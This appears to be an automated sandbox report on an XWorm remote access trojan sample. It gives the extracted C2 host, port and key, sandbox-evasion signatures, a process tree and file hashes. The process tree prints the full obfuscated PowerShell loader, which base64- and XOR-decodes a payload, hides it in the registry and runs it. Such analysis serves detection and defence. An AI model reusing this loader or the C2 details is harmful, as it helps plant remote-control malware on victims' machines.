Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
86s -
max time network
86s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
-
submitted
01/03/2025, 19:07
General
-
Target
https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel
Malware Config
Extracted
xworm
5.0
meowycatty.ddns.net:8843
jRccj8SKwN7fQIlB
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 2 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 55 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://files.fbiagency.info/content/cdn/krTVmufRVRif.rel2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1872 -prefMapHandle 1864 -prefsLen 27359 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {92863848-2ab2-4007-98be-697c7c8b8b0e} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 28279 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be02b842-ac80-4d83-bcf1-4cfbe717391a} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" socket3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3020 -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3008 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {073aa8ff-f4bb-4087-a5be-4790dc325326} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3660 -childID 2 -isForBrowser -prefsHandle 3652 -prefMapHandle 2724 -prefsLen 32769 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eba612a4-905d-470c-85c8-778bbdab00f0} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4752 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4748 -prefMapHandle 4744 -prefsLen 32769 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b02c5b74-427a-4f76-9f32-7207d35dbf4d} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" utility3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5244 -childID 3 -isForBrowser -prefsHandle 5304 -prefMapHandle 5296 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ef39b0e-818e-447d-9aa2-8d707d36e885} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5520 -prefMapHandle 5516 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc34823c-e7f0-48c8-a3fe-2c388483e6b8} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5636 -childID 5 -isForBrowser -prefsHandle 5644 -prefMapHandle 5652 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25b5f928-6922-487c-b410-6f0a4e6924e2} 6024 "\\.\pipe\gecko-crash-server-pipe.6024" tab3⤵
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\krTVmufRVRif.bat" "1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:xrDrGAvriu;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path;};$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-loJDe' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\krTVmufRVRif.bat"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:xrDrGAvriu;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path;};$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-loJDe' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
6KB
MD55b3db8803542e7836f0b2d2b9d28b64a
SHA1a96c1321f1fd5b7028d397b9fcabee9989f45b1b
SHA256b9458f6af3c7044580944b528453df833602b6c2d565f4e38608aa1c11b523ef
SHA512c6b19b7ad3a25a801ed1df0eaf3570cc67de073e45124f6fdee493b70a74e616a35636ccba0e997d49611d75f72e119d3d302ba49bb3813566cb8f1feca82098
-
Filesize
6KB
MD5e70b0eda4069e711a5be7a3c8ebd5f9e
SHA11916c6910537354f10486993600f33cb8782866d
SHA256ffd0243fcc9958c3f5d2ec05e3b8ebba5317a2db1fd1e2a78f5b94f694dd206d
SHA512317b331b967a49f6b76393ed7b19ad725494c88d5499406dfc9c48bd0732666f3f0fc7f799c1b190cc7d6591eb2dbce312a08c2a0d9376572ded48b007ac9576
-
Filesize
7KB
MD536e70f7c4585166d3d7bd7f69f67f307
SHA186696f9c3e5b313762295ecc5e1116469bc60bde
SHA256e1c6b8f8f405dc7d04d79cc631971fdab85fb7fd4b4362ea25d7222f59e2a007
SHA51278ea17cfbb4b148b7eb5b00a95a9f54c84641c547ac633b25a0c6c8dc0d8ef90f291f398bffe36b77c5386aa2ee8c81f1dd4b059e68b366ec3b0e4e858249932
-
Filesize
10KB
MD57fc0d898600851e42ca3a79ea69cdfda
SHA170d73ed7caed187264b3a9a22be594498a040e18
SHA256a4dfbea76dda87d2f968272fb9d87c31fbd44425a322ffd19033c6fc8091b413
SHA5127c01fc67989d232b060b0e7d56278f42ce0ba825a3a30cd6ed30ea1bb7ca9b28ba8ae35a60e3410854b6703c43cc49786bd625f0bf48c5a6104fa5b0ddc7edbc
-
Filesize
5KB
MD58a1bb8c9ca4935d6ca785e6bc1fef74c
SHA1969cb180476c77963806b5e323b2f4a4c8c9dd93
SHA25664d8f62735589c5acd4d0c2eced2823bf1370edd8b1f59450dbc6c9abbcf95f1
SHA512772e0bbdb19f219014142741f2127a8f0db657772f9f6541292eeef98261d9f307c8d5c8c973c5d33531854516643d96a848cc370624efa795b1ceea9a6cb38a
-
Filesize
6KB
MD5ee6b9a66eabc2ab080dac4c10069e315
SHA199b2a113f71fde7c920838242a3e4af344e9dddf
SHA256f32983cf181fb110aa2ecbfd1bb30badb3175f677f6fbe44950482c596e10452
SHA512072f2cc2d44bd9a259591eda686aee13a4db768f78617ca0e0a6950fdbe1333601d2611e38ce8c06108f41acdf8325b6ddd7696525763cf4472cbb70d4de6c98
-
Filesize
26KB
MD5110ce6b5a6db7b6aeb72dadefce1e304
SHA1f067f54f4f256eb9051a58746d09ca80bd0c16b4
SHA2568f69ec61bbaac7b59e8960b49c1d6b405b32a0f5ec6769d6752d6e75ac21a88b
SHA512296794c9f27e080fda2544dfb58ed82f8980fed646936f4fa21e967b91470d4c5ec4a728d06a93e97f94a062c0d64117f228d6692462c19c730bf3b0b0aa9110
-
Filesize
671B
MD521062c2db1c15d1f7452f10cc8411d2d
SHA106df458d1ee66d080eb6175c89b3b2f18dc36301
SHA256359fcf42eccf028249db819f67c55d4d22030620aad9c0efc6628eb68fafcac6
SHA5124dcc552b47fd52147dc8d1f035ae8abbb89841450026e952efa734e233cbba2641a3f4a042f86ca91265f903f97cb31f85ca30d2acb7edd32ae8893e2f6b7d54
-
Filesize
982B
MD507855616e94bea34460da87f7f77d643
SHA151638b75173549138be70f1535021548107deaf6
SHA2565a8a8f8020824acf7d3f16262e712e74e9fe49d8e7832c5fb210e6a0aabf08a7
SHA51279951297fa0898c7f888bb175a00100cf155b16fb53f63df39371637880df6428b2fba196bd3ba0d1bb988c1b0fd6271aa38ce5742453e693c6e599b79f6db99
-
Filesize
1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
Filesize
116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
Filesize
372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
Filesize
17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD50dc803fcefadcefd369cdca072a64cff
SHA1d1e8233c2f74a8cd4d848ab591e49cf88beb0ae9
SHA2562ae8467ca6631ed0164bff16ca7212ea764cfa9d1509a437696c3278a82ff738
SHA51260f050503e698fb4e76c47716f26e3ebfacedc84720f2d32adb566cd90c4cbbcfe16c108a2b9a7e1368b2be2c494cb4e572f907f1cda7cba06b9223822f1e44d
-
Filesize
9KB
MD56099a764799038f3be168a0b102ea98c
SHA1f6a6c4d58f9b0e019075d72d4c067e84af3c87d0
SHA256dc50456a846058ae0020bc08fe6d4eb0fe84edbd87570c4f403c95eaf161d4c4
SHA512b3ba004c53c70d00bf64b2d93897c8fc22891aa4924c22fcd94f6030290ada7dc27af8a17c5cba8c3b53f47a7ee931ef3ece42d69241c16afb849443bc57e953
-
Filesize
10KB
MD5e55d126f56bb4973367fb2e3e74aa0cd
SHA10d83bd38a84e387421c585a3c012e1f22ac62b37
SHA2568438df421dbf662d4d5dc37b3dca5a75b44a24e713bf6a385b6d7b6875169199
SHA512b7f63e2a8fcb76eebb14581b30724b8868169be5bb23d7c93795bb14b8894e5e2c049291c7d08d588fdb2f907a29b705ea721afe12bb2a2c77ec577e6b32635f
-
Filesize
4.3MB
MD5c475591ab334bd766b868d4d706938db
SHA10e89e12020e858db58b4f8e250c6fea7e03ed95e
SHA25638908b3b24f91dd837b7f3730f9e0258337f26274ce71bc2f299c5662247fcf6
SHA5123611b20c0f2918abb33c7869a3755ad78a274dfaab8c69768bd3e3a8762837dedb8b45c64133133dd6d60b8986ca9cfb0db79c0b27cb9bb4cbd7138f286bc28b
-
Filesize
7.2MB
MD5f6d8913637f1d5d2dc846de70ce02dc5
SHA15fc9c6ab334db1f875fbc59a03f5506c478c6c3e
SHA2564e72ca1baee2c7c0f50a42614d101159a9c653a8d6f7498f7bf9d7026c24c187
SHA51221217a0a0eca58fc6058101aa69cf30d5dbe419c21fa7a160f44d8ebbcf5f4011203542c8f400a9bb8ee3826706417f2939c402f605817df597b7ff812b43036
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
756KB
-
Filesize
2.0MB
-
Filesize
352KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
1.2MB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
1.3MB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
10.8MB
-
Filesize
56KB
-
Filesize
8KB
-
Filesize
1.3MB
-
Filesize
48KB
-
Filesize
10.8MB
-
Filesize
756KB
-
Filesize
1.3MB
-
Filesize
2.0MB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB